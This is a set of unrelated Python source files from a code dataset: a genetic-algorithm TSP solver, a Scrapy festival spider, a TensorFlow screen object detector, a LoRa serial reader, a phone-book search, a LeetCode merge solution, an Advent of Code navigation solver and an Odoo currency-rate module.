parent2.genes[j]\n if over not in values_checked:\n\n # Add the value to the checked values, 
and update the child\n # with the new gene\n values_checked += [over]\n child.genes[i] = over\n i += 1\n # Continue\n j += 1\n return child\n \n def reciprocalExchangeMutation(self, ind):\n # Generate random integer (index of first gene to swap); genSize is an int, so use it directly rather than len()\n gene1 = random.randint(0, ind.genSize-1)\n\n # Generate random integer (index of second gene to swap)\n gene2 = random.randint(0, ind.genSize-1)\n\n # If both point to the same index, change the second index\n while gene1 == gene2:\n gene2 = random.randint(0, ind.genSize-1)\n\n # Store the value of the gene at the first gene index\n gene_holder = ind.genes[gene1]\n\n # Set the value of the gene at the first gene index to the value of the gene at the second gene index\n ind.genes[gene1] = ind.genes[gene2]\n\n # Set the value of the gene at the second gene index to the value in the gene_holder object\n ind.genes[gene2] = gene_holder\n\n return ind\n\n def inversionMutation(self, ind):\n # Randomly generate an integer (index of one of the swapping points)\n gene1 = None\n gene2 = None\n # If both index points are None or the same, re-generate new index\n # points\n while gene1 == gene2:\n # Randomly generate an integer (index of one of the swapping points)\n gene1 = random.randint(0, ind.genSize-1)\n\n # Randomly generate an integer (index of one of the swapping points)\n gene2 = random.randint(0, ind.genSize-1)\n i = 0\n j = 0\n # If the first number generated is greater than the 2nd, set i = 2nd\n # index generated\n if gene1 > gene2:\n i = gene2\n j = gene1\n else:\n i = gene1\n j = gene2\n \n # Double-ended search\n # While the lower index is less than the higher index:\n while i < j:\n # Store the value of the child's ith gene\n gene_holder = ind.genes[i]\n\n # Replace the value of the child's ith gene with the value in the\n # child's jth gene\n ind.genes[i] = ind.genes[j]\n\n # Replace the value of the child's jth gene with the value in the\n # gene holder (the original value in the child's ith gene)\n ind.genes[j] = gene_holder\n\n # Increment i, decrement j\n i += 1\n j -= 1\n \n return ind\n\n def crossover(self, indA, indB):\n \"\"\"\n Executes an order-1 crossover and returns a new individual\n \"\"\"\n child = []\n tmp = {}\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n for i in range(0, self.genSize):\n if i >= min(indexA, indexB) and i <= max(indexA, indexB):\n tmp[indA.genes[i]] = False\n else:\n tmp[indA.genes[i]] = True\n aux = []\n for i in range(0, self.genSize):\n if not tmp[indB.genes[i]]:\n child.append(indB.genes[i])\n else:\n aux.append(indB.genes[i])\n child += aux\n return child\n\n def mutation(self, ind):\n \"\"\"\n Mutate an individual by swapping two cities with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def updateMatingPool(self):\n \"\"\"\n Updating the mating pool before creating a new generation\n \"\"\"\n self.matingPool = []\n for ind_i in self.population:\n self.matingPool.append( ind_i.copy() )\n\n def newGeneration(self):\n \"\"\"\n Creating a new generation\n 1. Selection\n 2. Crossover\n 3. 
Mutation\n \"\"\"\n for i in range(0, len(self.population)):\n\n # Random selection\n indexParent1 = random.randint(0, len(self.matingPool)-1)\n indexParent2 = random.randint(0, len(self.matingPool)-1)\n\n parent1 = self.matingPool[indexParent1]\n parent2 = self.matingPool[indexParent2]\n\n # Uniform crossover\n child = self.uniformCrossover(parent1, parent2)\n\n # Inversion mutation\n child = self.inversionMutation(child)\n\n # Compute fitness\n child.computeFitness()\n \n # Put into population\n self.population[i] = child\n\n # Calculate best\n if child.getFitness() < self.best.getFitness():\n self.best = child\n\n print (\"Best so far =============\")\n print (\"Iteration: \"+str(self.iteration))\n print (\"Cost: \"+str(self.best.getFitness()))\n print (\"=========================\")\n \n \"\"\"\n Depending of your experiment you need to use the most suitable algorithms for:\n 1. Select two candidates\n 2. Apply Crossover\n 3. Apply Mutation\n \"\"\"\n\n def GAStep(self):\n \"\"\"\n One step in the GA main algorithm\n 1. Updating mating pool with current population\n 2. Creating a new Generation\n \"\"\"\n\n self.updateMatingPool()\n self.newGeneration()\n\n def search(self):\n \"\"\"\n General search template.\n Iterates for a given number of steps\n \"\"\"\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())\n\n\"\"\"if len(sys.argv) < 2:\n print (\"Error - Incorrect input\")\n print (\"Expecting python BasicTSP.py [instance] \")\n sys.exit(0)\n\n\nproblem_file = sys.argv[1]\"\"\"\n\nfor i in range(5):\n ga = BasicTSP(\"inst-13.tsp\", 100, 0.1, 500)\n ga.search()\n print(\"1:\", i, ga.best.getFitness())\n","sub_path":"assignment-1/config1/TSP_R00140363-config1.py","file_name":"TSP_R00140363-config1.py","file_ext":"py","file_size_in_byte":14569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"26060258","text":"import os.path as osp\ncur_dir = osp.dirname(osp.abspath(__file__))\n\nimport yaml\nfrom easydict import EasyDict as edict\nfrom deepcls.mmcls.dataset import MultiClassDataset\n\ndef get_pipeline(pipelines, tp):\n if 'train' in tp:\n p = pipelines['train']\n elif 'val' in tp:\n p = pipelines['val']\n else:\n assert tp == 'test'\n p = pipelines['test']\n return p\n\ndef make_dataset_book(data_root, tp, pipelines, classes, img_size):\n assert tp in ('train', 'val_train', 'val', 'test')\n return MultiClassDataset(\n class_dic=classes,\n ann_file=osp.join(data_root, 'splits'),\n data_prefix=osp.join(data_root, f'images_{img_size[0]}x'),\n pipeline=get_pipeline(pipelines, tp),\n tp=tp,\n )\n\n\nbook_class_dic = yaml.safe_load(open(osp.join(cur_dir, 'tasks.yaml')))['class_dic']\n\nDATASETS = edict({\n 'book': {\n 'classes': book_class_dic,\n 'data_root': 'books/',\n 'img_size': (512, 512),\n 'make_dataset': make_dataset_book,\n }\n})\n\nif __name__ == \"__main__\":\n ds = make_dataset_book('../data/books', 'train', {'train': []}, {}, (1024, 1024))\n\n ds.load_annotations()\n","sub_path":"bookrecog_server/samples/model_datasets.py","file_name":"model_datasets.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395204863","text":"from exceptions import IndexError\nimport datetime\n\nfrom scrapy.http import Request\nfrom scrapy.spider import Spider\nfrom scrapy.selector import 
Selector\n\nfrom rdf.items import FestivalItem\nfrom rdf.settings import GOOGLE_API_KEY\n\nfrom gf.models import Festival\nfrom gf.models import Location\nfrom gf.models import Artist\nfrom gf.models import Day\n\nclass SpiderSpider(Spider):\n name = \"spider\"\n base_url = u'http://www.routedesfestivals.com'\n start_urls = [\n \"http://www.routedesfestivals.com/les-festivals-pour-Mai/2014-05.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Juin/2014-06.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Juillet/2014-07.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Aout/2014-08.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Septembre/2014-09.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Novembre/2014-11.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Decembre/2014-12.html\",\n ]\n\n georeverse_url = 'https://maps.googleapis.com/maps/api/geocode/xml?sensor=false&language=fr&key='+GOOGLE_API_KEY+'&address='\n\n def parse(self, response):\n sel = Selector(response);\n festivals = sel.xpath('//ul[@id=\"festListe\"]/li/ul/li')\n for f in festivals:\n name = f.xpath('*/a[@class=\"nameList\"]')\n extracted_name = name.xpath('text()')[0].extract().title()\n festival = self.get_festival_item_from_name(extracted_name)\n festival['name'] = extracted_name\n fest_url = name.xpath('@href')[0].extract()\n if 'location' not in festival:\n # Test and skip festival without location\n try:\n f.xpath('*/a[@class=\"villeList\"]/text()')[0]\n except IndexError:\n continue\n location_request = self.parse_location(f.xpath('*/a[@class=\"villeList\"]/text()'), festival)\n if location_request is not None:\n yield location_request\n request = Request(self.base_url+fest_url, callback=self.parse_festival)\n request.meta['festival'] = festival\n yield request\n\n next = sel.xpath('//a[@class=\"suivant\"]/@href').extract()\n if len(next):\n yield Request(self.base_url+next[0], callback=self.parse)\n\n def parse_location(self, l, festival):\n location = Location()\n location.city = l[0].extract()\n brackets = l[1].extract()\n if(brackets.isnumeric()):\n location.dpt_code = brackets\n location.country = 'France'\n else:\n location.country = brackets\n location.dpt_code = '0'\n \n db_location = Location.objects.filter(city = location.city, country = location.country, dpt_code = location.dpt_code)\n request = None\n if db_location:\n festival['location'] = db_location[0]\n else:\n location.save()\n location_list = [location.city.replace(' ','+')]\n if(location.dpt_code != '000'):\n location_list.append(location.dpt_code.replace(' ','+'))\n location_list.append(location.country.replace(' ','+'))\n concat_location = ','.join(location_list)\n request = Request(self.georeverse_url+concat_location, callback = self.geocoding_callback)\n request.meta['location_id'] = location.id\n festival['location'] = location\n return request\n \n \n def geocoding_callback(self, response):\n location = Location.objects.filter(id = response.meta['location_id'])[0]\n sel = Selector(response)\n try:\n location.dpt = sel.xpath('//address_component/type[text()=\"administrative_area_level_2\"]/preceding-sibling::long_name/text()')[0].extract()\n except IndexError:\n pass\n try:\n location.region = sel.xpath('//address_component/type[text()=\"administrative_area_level_1\"]/preceding-sibling::long_name/text()')[0].extract()\n except IndexError:\n pass\n location.lat = sel.xpath('//geometry/location/lat/text()')[0].extract()\n location.lng = 
sel.xpath('//geometry/location/lng/text()')[0].extract()\n location.save()\n\n def parse_festival(self, response):\n '''\n Parse festival page to get details\n '''\n sel = Selector(response)\n festival = response.meta['festival']\n festival['website'] = response.url\n try:\n festival['image_url'] = sel.xpath('//a[@class=\"image_presentation\"]/@href')[0].extract()\n except IndexError:\n pass\n django_festival = festival.save()\n days = sel.xpath('//ul[@class=\"liste_concerts\"]/li[@class=\"fest\"]')\n day_list = []\n for da in days:\n day = Day()\n day.festival = django_festival\n try:\n date = da.xpath('time/@datetime')[0].extract()\n day.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S').date()\n except IndexError:\n continue\n db_day = Day.objects.filter(date=day.date, festival = django_festival)\n if db_day:\n day = db_day[0]\n else:\n day.save()\n artists = da.xpath('span[@class=\"info_fest\"]//a[@class=\"artiste\"]/text()')\n for a in artists:\n artist = Artist()\n artist.name = a.extract().title()\n db_artist = Artist.objects.filter(name=artist.name)\n if db_artist:\n day.artists.add(db_artist[0])\n else:\n artist.save()\n day.artists.add(artist)\n day_list.append(day)\n day_list.sort(key = lambda day: day.date)\n try:\n festival['begin_date'] = day_list[0].date\n festival.instance.begin_date = festival['begin_date']\n festival['end_date'] = day_list[-1].date\n festival.instance.end_date = festival['end_date']\n except IndexError:\n pass\n \n return festival\n\n def get_festival_item_from_name(self, name):\n query_result = Festival.objects.filter(name=name)\n fest_item = FestivalItem()\n if query_result:\n fest_item._instance = query_result[0]\n fest_item['name'] = query_result[0].name\n fest_item['location'] = query_result[0].location\n fest_item['end_date'] = query_result[0].end_date\n fest_item['begin_date'] = query_result[0].begin_date\n fest_item['website'] = query_result[0].website\n fest_item['total_price'] = query_result[0].total_price\n else:\n fest_item['name'] = name\n return fest_item\n","sub_path":"rdf/rdf/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113842411","text":"import numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport mss\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n\nimport cv2\n\nsys.path.append(\"..\")\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\nMODEL_NAME = 'faster_inference_graph'\n\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', 'object-detection.pbtxt')\n\nNUM_CLASSES = 3\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n 
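# image.getdata() yields a flat RGB pixel sequence; reshape it to (im_height, im_width, 3) uint8, the layout the detection graph expects\n 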
return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n while True:\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n monitor = {'top': 0, 'left': 0, 'width': 960, 'height': 540}\n pix = mss.mss().grab(monitor)\n image = Image.frombytes('RGB', pix.size, pix.rgb)\n #image = Image.open(imagename)\n image_np = load_image_into_numpy_array(image)\n \n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represents the level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = detection_graph.get_tensor_by_name('detection_scores:0')\n classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n width = 960\n height = 540\n ymin = boxes[0][0][0]*height\n xmin = boxes[0][0][1]*width\n ymax = boxes[0][0][2]*height\n xmax = boxes[0][0][3]*width\n print(ymin)\n print(xmin)\n print(ymax)\n print(xmax)\n\n objects = []\n for index, value in enumerate(classes[0]):\n object_dict = {}\n if scores[0, index] > 0.5:\n object_dict[(category_index.get(value)).get('name').encode('utf8')] = \\\n scores[0, index]\n objects.append(object_dict)\n print(objects)\n\n # Visualization of the results of a detection.\n #vis_util.visualize_boxes_and_labels_on_image_array(\n # image_np,\n # np.squeeze(boxes),\n # np.squeeze(classes).astype(np.int32),\n # np.squeeze(scores),\n # category_index,\n # use_normalized_coordinates=True,\n # line_thickness=8)\n\n # cv2.imshow('object detection', cv2.resize(image_np, (400,300)))\n # if cv2.waitKey(25) & 0xFF == ord('q'):\n # cv2.destroyAllWindows()\n # break\n","sub_path":"research/object_detection/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"582115946","text":"# www.ifroglab.com\n# -*- coding: utf8 -*-\n# coding=UTF-8\n# * iFrogLab IL-LORA1272 www.ifroglab.com\n# *\n# * Function: USB to TTL, IFROGLAB LORA\n# * Power VDD, 3.3V, Pin 3\n# * Ground GND, GND, Pin 1\n# * Receive indication Host_IRQ, null, Pin 2\n# * UART, RX, UART_RX Pin 7\n# * UART, TX, UART_TX Pin 8\n\nimport ifroglab\nimport time\nimport serial\n\ndef Fun_CRC(data):\n crc=0\n for i in data:\n crc=crc^i\n return crc\n\nLoRa = ifroglab.LoRa()\n\n\n# Find the last USB UART device\nprint(\"List All Ports, serial_ports()\")\nserPorts=LoRa.serial_allPorts()\nprint(serPorts)\nportName=serPorts[-1]\n\n\n# Open the port\nprint(\"Open Port, FunLora_init()\")\nser=LoRa.FunLora_initByName(portName)\n\n\n# Read the F/W version and Chip ID\nprint(\"Get Firmware Version, FunLora_0_GetChipID()\")\nLoRa.FunLora_0_GetChipID()\n\n# Reset & initialize\nprint(\"Init, FunLora_1_Init()\")\nLoRa.FunLora_1_Init()\n\n\n# Read the configuration state\nprint(\"\\n[4]:FunLora_2_ReadSetup\");\nLoRa.FunLora_2_ReadSetup();\n\n\n# Set up receiving and the frequency band\nprint(\"\\n[7]:FunLora_3_RX\")\nLoRa.FunLora_3_RX();\n\n\n\n\n# Read data\nprint(\"\\n[8]:FunLora_6_read\")\ndata=LoRa.FunLora_6_read();\n\ni=0\nfor t1 in data:\n 
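# print every byte received from the LoRa module together with its index\n 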
print(\"data[%d]= %s\"%(i,t1))\n i=i+1\n\n\n#讀取資料\nprint(\"\\n[9]:FunLora_7_readCounter\")\ndata=LoRa.FunLora_7_readCounter()\n\n#i=0\t\n#for t1 in data:\n# print(\"data[%d]=%s, Hex->%s\"%(i,t1,t1.encode('hex')))\n# i=i+1\n\n#print(\"data[4]=%s, Hex->%s\"%(data[4],data[4].encode('hex')))\n#print(\"data[5]=%s, Hex->%s\"%(data[5],data[5].encode('hex')))\n\n#讀取資料\ncounter=0\nlastData=[]\nLoRa.debug=False\nwhile True:\n data=LoRa.FunLora_6_readPureData()#取得收到的純資料\n if(len(data)>0):\n if(LoRa.Fun_ArrayIsSame(lastData,data)==False): # 僅顯示出不同的資料\n lastData = list(data)\n counter=counter+1 \n print(data) \n print(counter)\n\n\n\n\n\n\n\n# 關閉\nLoRa.FunLora_close() \nser.close()\n\n","sub_path":"Samples-Python/02-iFrogLabLevel1-Lib/ap-Lib-4-lora-readAndDisplayDifferentData.py","file_name":"ap-Lib-4-lora-readAndDisplayDifferentData.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"468469596","text":"class PhoneBook():\n def __init__(self, phone_book):\n self.phone_book = phone_book\n self.sort_phone_book()\n\n def find(self, number, start, end):\n middle = int((end + start) / 2)\n current_number = self.phone_book[middle][0]\n if current_number == number:\n return self.phone_book[middle][1]\n elif (current_number > number):\n end = middle\n else:\n start = middle\n return self.find(number, start, end)\n\n def find_numbers(self, numbers):\n for number in numbers:\n print(self.find(number, 0, len(self.phone_book)))\n\n def sort_phone_book(self):\n self.phone_book = sorted(self.phone_book, key=lambda tup: tup[0])\n\n\ndef main():\n lengths = input().split(\" \")\n book_length = int(lengths[0])\n searched_numbers_length = int(lengths[1])\n phone_book = []\n counter = 0\n while counter < book_length:\n phone_book.append(input().split(\" \"))\n phone_book[counter][0] = int(phone_book[counter][0])\n counter = counter + 1\n counter = 0\n searched_numbers = []\n while counter < searched_numbers_length:\n searched_numbers.append(int(input()))\n counter = counter + 1\n phone_book = PhoneBook(phone_book)\n phone_book.find_numbers(searched_numbers)\n\nif __name__ == '__main__':\n main()\n","sub_path":"week2/4-Phone-Book/phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"360995108","text":"\"\"\"\r\nproblem 23: Merge k Sorted Lists\r\nhttps://leetcode.com/problems/merge-k-sorted-lists/\r\n\r\nsolution:\r\n https://leetcode.com/problems/merge-k-sorted-lists/solution/\r\n\r\n\"\"\" \r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def mergeKLists(self, lists):\r\n \"\"\"\r\n :type lists: List[ListNode]\r\n :rtype: ListNode\r\n \"\"\"\r\n def divide(l, r):\r\n if l <= r:\r\n middle = l + (r - l) // 2\r\n left = divide(l, middle)\r\n right = divide(middle + 1, r)\r\n return merge(left, right)\r\n else:\r\n return None\r\n\r\n def merge(left, right):\r\n dummy = ListNode(0)\r\n head = dummy\r\n while left or right:\r\n if left is None:\r\n head.next = right\r\n break\r\n elif right is None:\r\n head.next = left\r\n break\r\n else:\r\n if left.val <= right.val:\r\n head.next = left\r\n left = left.next\r\n else:\r\n head.next = right\r\n right = right.next\r\n head = head.next\r\n return dummy.next\r\n\r\n return divide(0, len(lists) - 
1)\r\n","sub_path":"P23.py","file_name":"P23.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71201308","text":"import math\nfrom typing import List, Dict, NamedTuple, Literal\nfrom dataclasses import dataclass\nfrom nav_instructions import sample, instructions\n\n\nclass Instruction(NamedTuple):\n cmd: Literal['N', 'S', 'E', 'W', 'L', 'R', 'F']\n val: int\n \n @staticmethod\n def read(x: str):\n return Instruction(cmd=x[0], val=int(x[1:]))\n \n \n@dataclass \nclass Status(Dict):\n x: int\n y: int\n facing: Literal['N', 'S', 'E', 'W', None]\n \n\nclass Boat(NamedTuple):\n plan: List[Instruction]\n origin: Status = Status(x=0, y=0, facing='E')\n status: Status = Status(x=0, y=0, facing='E')\n waypoint: Status = Status(x=10, y=1, facing='E')\n \n @staticmethod\n def initialize(data: str):\n parsed_instructions = [Instruction.read(x) for x in data.split(\"\\n\")]\n start = Status(x=0, y=0, facing=\"E\")\n current = Status(x=0, y=0, facing=\"E\")\n wp = Status(x=10, y=1, facing=None)\n return Boat(plan=parsed_instructions, origin=start, status=current, waypoint=wp)\n \n \n def do_one(self, move: Instruction):\n \"\"\"Process a single move & update self.status\"\"\"\n cmd, val = move\n # Movement\n if cmd == \"N\":\n self.status.y += val \n elif cmd == \"S\":\n self.status.y -= val \n elif cmd == \"E\":\n self.status.x += val \n elif cmd == \"W\":\n self.status.x -= val \n elif cmd == \"F\":\n self.do_one(Instruction(cmd=self.status.facing, val=val))\n \n # Turning\n elif cmd in \"LR\":\n directions = list(\"NESWNES\")\n\n if cmd == \"L\":\n directions = directions[::-1]\n \n self.status.facing = directions.pop(\n directions.index(self.status.facing) + val // 90\n )\n return\n \n def waypoint_one(self, move: Instruction):\n cmd, val = move\n # Movement\n if cmd == \"N\":\n self.waypoint.y += val \n elif cmd == \"S\":\n self.waypoint.y -= val \n elif cmd == \"E\":\n self.waypoint.x += val \n elif cmd == \"W\":\n self.waypoint.x -= val\n elif cmd == \"L\":\n self.rotate_waypoint(val)\n elif cmd == \"R\":\n self.rotate_waypoint(-val)\n elif cmd == \"F\":\n delta_x = self.waypoint.x - self.status.x\n delta_y = self.waypoint.y - self.status.y\n\n self.status.x += delta_x * val\n self.status.y += delta_y * val\n self.waypoint.x = self.status.x + delta_x\n self.waypoint.y = self.status.y + delta_y\n return\n\n def rotate_waypoint(self, deg):\n \"\"\"Adapted from here:\n https://stackoverflow.com/a/34374437\n \"\"\"\n angle = deg * math.pi / 180\n ox, oy = self.status.x, self.status.y\n px, py = self.waypoint.x, self.waypoint.y\n \n self.waypoint.x = ox + math.cos(angle) * (px-ox) - math.sin(angle) * (py-oy)\n self.waypoint.y = oy + math.sin(angle) * (px-ox) + math.cos(angle) * (py-oy)\n return \n \n def navigate(self, method=None):\n if method in ['waypoint', 'wp', 2]:\n func = self.waypoint_one\n else:\n func = self.do_one\n for move in self.plan:\n func(move)\n return int(abs(self.status.x) + abs(self.status.y))\n \n @property\n def dwp(self):\n \"\"\"Helper function to display offset of the waypoint instead of its exact position\"\"\"\n return self.waypoint.x - self.status.x, self.waypoint.y - self.status.y\n \n \nb = Boat.initialize(sample)\ntaxi_dist = b.navigate()\nassert taxi_dist == 25\n\nw = Boat.initialize(sample)\ntaxi_dist = w.navigate('waypoint')\nassert taxi_dist == 286\n\n\nif __name__ == \"__main__\":\n b = Boat.initialize(instructions)\n print(b.navigate())\n \n w = 
Boat.initialize(instructions)\n print(w.navigate('wp'))","sub_path":"day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"606425249","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime, timedelta\nfrom .currency_helper import CurrencyHelper\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n use_currency_rate = fields.Boolean(string=\"Use Currency Rate\")\n currency_rate_type_id = fields.Many2one('res.currency.rate.type', string='Para Birimi Kur Tipi')\n use_custom_rate = fields.Boolean(string=\"Özel Kur\")\n custom_rate = fields.Float(string='Custom Rate(Özel Kur Değeri)', digits=(12, 6))\n currency_rate = fields.Float(string=\"Para Birimi Kuru\", digits=(12, 6), default=1.0,\n compute='update_currency_rate',\n inverse='_set_custom_rate',\n store=True,\n states={'draft': [('readonly', False)]})\n company_currency_id = fields.Many2one('res.currency', 'Company Currency', related='company_id.currency_id', readonly=True)\n amount_untaxed_signed = fields.Monetary(string='Vergiler Hariç Tutar',\n currency_field='company_currency_id', store=True,\n readonly=True, compute='compute_amount_company_signed')\n amount_total_company_signed = fields.Monetary(string='Toplam (Şirket Para Birimi)',\n currency_field='company_currency_id', store=True,\n readonly=True, compute='compute_amount_company_signed',\n help=\"Total amount in the currency of the company, negative for credit notes.\")\n\n @api.onchange('currency_id')\n def _onchange_pricelist(self):\n if self.currency_id:\n if self.currency_id.id != self.company_id.currency_id.id:\n self.use_currency_rate = True\n return\n self.use_currency_rate = False\n\n @api.multi\n def _set_custom_rate(self):\n if self.currency_rate:\n self.custom_rate = self.currency_rate\n\n @api.multi\n def get_currencies(self, company_currency, currency, date_to_search):\n rate_helper = CurrencyHelper()\n currency_rates = rate_helper.get_rates_on_date(date_to_search, currency, company_currency)\n return currency_rates\n\n @api.multi\n @api.depends('amount_total', 'currency_rate')\n def compute_amount_company_signed(self):\n for record in self:\n if record.currency_id:\n if not record.use_custom_rate:\n currency_id = record.currency_id\n if not record.currency_rate_type_id:\n record.amount_total_company_signed = currency_id.compute(record.amount_total,\n record.company_id.currency_id)\n record.amount_untaxed_signed = currency_id.compute(record.amount_untaxed,\n record.company_id.currency_id)\n else:\n record.amount_total_company_signed = currency_id.compute(record.amount_total,\n record.company_id.currency_id,\n rate_type=record.currency_rate_type_id.name)\n record.amount_untaxed_signed = currency_id.compute(record.amount_untaxed,\n record.company_id.currency_id,\n rate_type=record.currency_rate_type_id.name)\n else:\n record.amount_total_company_signed = record.amount_total * record.currency_rate\n record.amount_untaxed_signed = record.amount_untaxed * record.currency_rate\n else:\n record.amount_total_company_signed = record.amount_total\n record.amount_untaxed_signed = record.amount_untaxed\n\n @api.multi\n @api.depends('use_custom_rate', 'currency_rate_type_id', 'date_order', 'currency_id')\n def update_currency_rate(self):\n for record in self:\n if record.currency_id:\n if record.currency_id.id != record.company_id.currency_id.id:\n record.use_currency_rate = True\n else:\n 
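# For the AoC day-12 navigation code above: since every L/R instruction is a
# multiple of 90 degrees, the trig-based rotate_waypoint can be replaced by an
# exact integer rotation that avoids float rounding. A minimal standalone
# sketch (hypothetical helper, not part of any file in this set):
def rotate_quarter_turns(dx, dy, quarter_turns):
    """Rotate the waypoint offset (dx, dy) CCW by quarter_turns * 90 degrees."""
    for _ in range(quarter_turns % 4):
        dx, dy = -dy, dx  # one counter-clockwise quarter turn
    return dx, dy

assert rotate_quarter_turns(10, 4, 1) == (-4, 10)  # "L90" on offset (10, 4)
assert rotate_quarter_turns(10, 4, 3) == (4, -10)  # "R90" == three CCW turns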
record.use_currency_rate = False\n else:\n record.use_currency_rate = False\n\n if not record.use_custom_rate and record.use_currency_rate:\n currency_rate_obj = self.env['res.currency.rate']\n date_found = datetime.strptime(datetime.today().strftime(\"%Y-%m-%d\"),\n \"%Y-%m-%d\") - timedelta(days=1)\n date_to_search = date_found.strftime(\"%Y-%m-%d\")\n if record.date_order:\n #date_found = datetime.strptime(record.date_order, \"%Y-%m-%d %H:%M:%S\") - timedelta(days=1)\n date_found = record.date_order - timedelta(days=1)\n date_to_search = date_found.strftime(\"%Y-%m-%d\")\n search_domain = [('currency_id', '=', record.currency_id.id),\n ('name', '=', date_to_search)]\n if record.company_id:\n search_domain += [('company_id', '=', record.company_id.id)]\n last_id = currency_rate_obj.search(search_domain, limit=1)\n # Get Currency Rate\n if not last_id:\n company_currency = record.company_id.currency_id.name if (\n record.company_id and record.company_id.currency_id) else \"TRY\"\n currency_rates = record.get_currencies(company_currency, record.currency_id.name, date_to_search)\n if currency_rates:\n # perform another search cause rate_helper returns different date then sent one\n search_domain = [('currency_id', '=', record.currency_id.id),\n ('name', '=', currency_rates[\"date\"])]\n if record.company_id:\n search_domain += [('company_id', '=', record.company_id.id)]\n last_id = currency_rate_obj.search(search_domain, limit=1)\n if not last_id:\n last_id = currency_rate_obj.create({'currency_id': record.currency_id.id,\n 'rate': currency_rates[\"banknote_selling\"],\n 'banknot_buying_rate': currency_rates[\n \"banknote_buying\"],\n 'forex_selling_rate': currency_rates[\n \"forex_selling\"],\n 'forex_buying_rate': currency_rates[\"forex_buying\"],\n 'name': currency_rates[\"date\"],\n 'company_id': record.company_id.id})\n\n if record.currency_rate_type_id:\n rate_type = record.currency_rate_type_id\n if rate_type.name == 'Efektif Satış':\n if last_id.rate > 0.0:\n record.currency_rate = 1 / last_id.rate\n elif rate_type.name == 'Efektif Alış':\n if last_id.banknot_buying_rate > 0.0:\n record.currency_rate = 1 / last_id.banknot_buying_rate\n elif rate_type.name == 'Döviz Satış':\n if last_id.forex_selling_rate > 0.0:\n record.currency_rate = 1 / last_id.forex_selling_rate\n elif rate_type.name == 'Döviz Alış':\n if last_id.forex_buying_rate > 0.0:\n record.currency_rate = 1 / last_id.forex_buying_rate\n else:\n if last_id.rate > 0.0:\n record.currency_rate = 1 / last_id.rate\n else:\n if not record.currency_rate:\n record.currency_rate = 1.0\n","sub_path":"tcmb_currency_rate_live-v12/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"264167085","text":"class 